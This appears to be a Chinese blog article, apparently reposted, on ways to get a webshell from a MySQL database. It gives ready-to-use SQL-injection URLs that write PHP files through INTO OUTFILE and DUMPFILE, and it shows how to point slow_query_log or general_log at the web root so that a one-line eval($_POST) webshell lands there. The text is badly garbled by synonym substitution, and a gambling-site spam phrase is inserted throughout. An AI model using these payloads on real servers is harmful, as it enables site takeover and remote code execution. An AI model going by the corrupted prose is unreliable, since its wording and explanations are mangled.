奇趣5分彩

mysql数据库奇趣5分彩getshell的体例总结

 更新时候:2022年07月11日 14:49:55   作者:Z3eyOnd  
MySQL版本大于5.0,MySQL 5.0版本以上会建立日记文件,咱们经由进程点窜日记文件的全局变量,便能够GetSHELL,上面这篇文章首要给大师先容了对于mysql数据库奇趣5分彩getshell的体例,须要的伴侣能够参考下

outfile和dumpfile写shell

操纵前提

  • 数据库今后用户为root权奇趣5分彩;
  • 晓得今后网站的相对途径;
  • PHPGPC为 off状况;(把戏引号,GET,POST,Cookie)
  • 写入的阿谁途径存在写入权奇趣5分彩。

基于union连奇趣5分彩查问:

?id=1 union select 1,'<?php phpinfo();?>',3 into outfile 'C:\phpstudy\www\shell.php'%23
?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile 'C:\phpstudy\www\shell.php'%23

非连奇趣5分彩查问

当咱们没法操纵连奇趣5分彩查问时,咱们能够操纵fields terminated bylines terminated by来写shell

?id=1 into outfile 'C:\phpstudy\www\shell.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23

取代奇趣5分彩格的体例

+号,%0a%0b%a0 、 /**/ 正文符等

outfile和dumpfile的区分

outfile:

1、 撑持多行数据同时导出

2、 操纵union连奇趣5分彩查问时,要保障两侧查问的列数不异

3、 会在换行符制表符前面追加反斜杠

4、会在开端追加换行

dumpfile:

1、 每次只能导出一行数据

2、 不会在换行符制表符前面追加反斜杠

3、 不会在开端追加换行

因此,咱们能够操纵into dumpfile这个函数来顺遂写入二进制文件;

固然into outfile函数也能够写入二进制文件,可是没法失效(追加的反斜杠会使二进制文件没法失效)

当咱们操纵dumpfile,应当手动增加 limit 奇趣5分彩定,来获得差别的行数

secure_file_prive

MySQL的secure-file-prive参数是用来奇趣5分彩定LOAD DATA, SELECT ,OUTFILE, and LOAD_FILE()传到奇趣5分彩一个指定目次的。

secure_file_prive= ,奇趣5分彩果为奇趣5分彩的话,表现许可任何文件读写

secure_file_prive=NULL,表现不许可任何文件读写

secure_file_prive=‘某个途径’,表现这个途径作为文件读写的途径

在mysql5.5版本前,奇趣5分彩是默许为奇趣5分彩,许可读取

在mysql5.6版本后 ,默许为NULL,并且没法用SQL语句对其停止点窜。以是这类只能在设置奇趣5分彩备摆设停止点窜。

查问secure_file_prive的参数

show global variables like "%secure%"

操纵sql语句点窜参数

set global secure_file_prive= 

可是5.6后不能操纵sql点窜了,以是只能操纵设置奇趣5分彩备摆设点窜

点窜value的值:
windows下点窜设置奇趣5分彩备摆设文件:mysql.ini
linux点窜设置奇趣5分彩备摆设文件:my.cnf

日记getshell

慢日记getshell

慢日记:

普通奇趣5分彩是经由进程long_query_time选项来设置这个时候值,时候以秒为单元,能够切确到微秒。若是查问时候跨越了这个时候值(默许为10秒),这个查问语句将被记实到慢查问日记奇趣5分彩。检查办事器默许时候值体例以下:

show global variables like '%long_query_time%'
show global variables like '%long%'

检查慢日记参数

show global variables like '%slow%'

对慢日记参数停止点窜

set global slow_query_log=1 #翻开慢日记
set global slow_query_log_file='c:\\phpstudy\\www\\test.php'#慢日记的途径
注重:必然要用双反斜杠
SELECT '<?php @eval($_POST[1]);?>' or sleep(11)
这儿11是跨越慢日记的10秒时候

操纵general_log

操纵general_log,能够将一切达到mysql办事器的sql语句,奇趣5分彩记实上去。

相干参数一共奇趣5分彩3个:general_log、log_output、general_log_file

show variables like 'general_log';  -- 检查日记是不是开启
set global general_log=on; -- 开启日记功效


show variables like 'general_log_file';  -- 看看日记文件保管地位
set global general_log_file='tmp/general.lg'; -- 设置日记文件保管地位


show variables like 'log_output';  -- 看看日记输入范例  table或file
set global log_output='table'; -- 设置输入范例为 table
set global log_output='file';   -- 设置输入范例为file

普通log_output奇趣5分彩是file,便是将日记存入文件奇趣5分彩。table的话便是将日记存入数据库的日记表奇趣5分彩。

getshell

set global general_log=on
set global general_log_file='须要进犯的途径'
select '<?php eval($_POST[cmd]);?>'

如许就将一句话木马记实到general_log奇趣5分彩,从而getshell

binlog的先容

能够看看这个

总结

到此这篇对于mysql数据库奇趣5分彩getshell体例的文章就先容到这了,更多相干mysql getshell的体例内容请搜刮剧本之奇趣5分彩之前的文章或持续阅读上面的相干文章但愿大师今后多多撑持剧本之奇趣5分彩!

相干文章

最新批评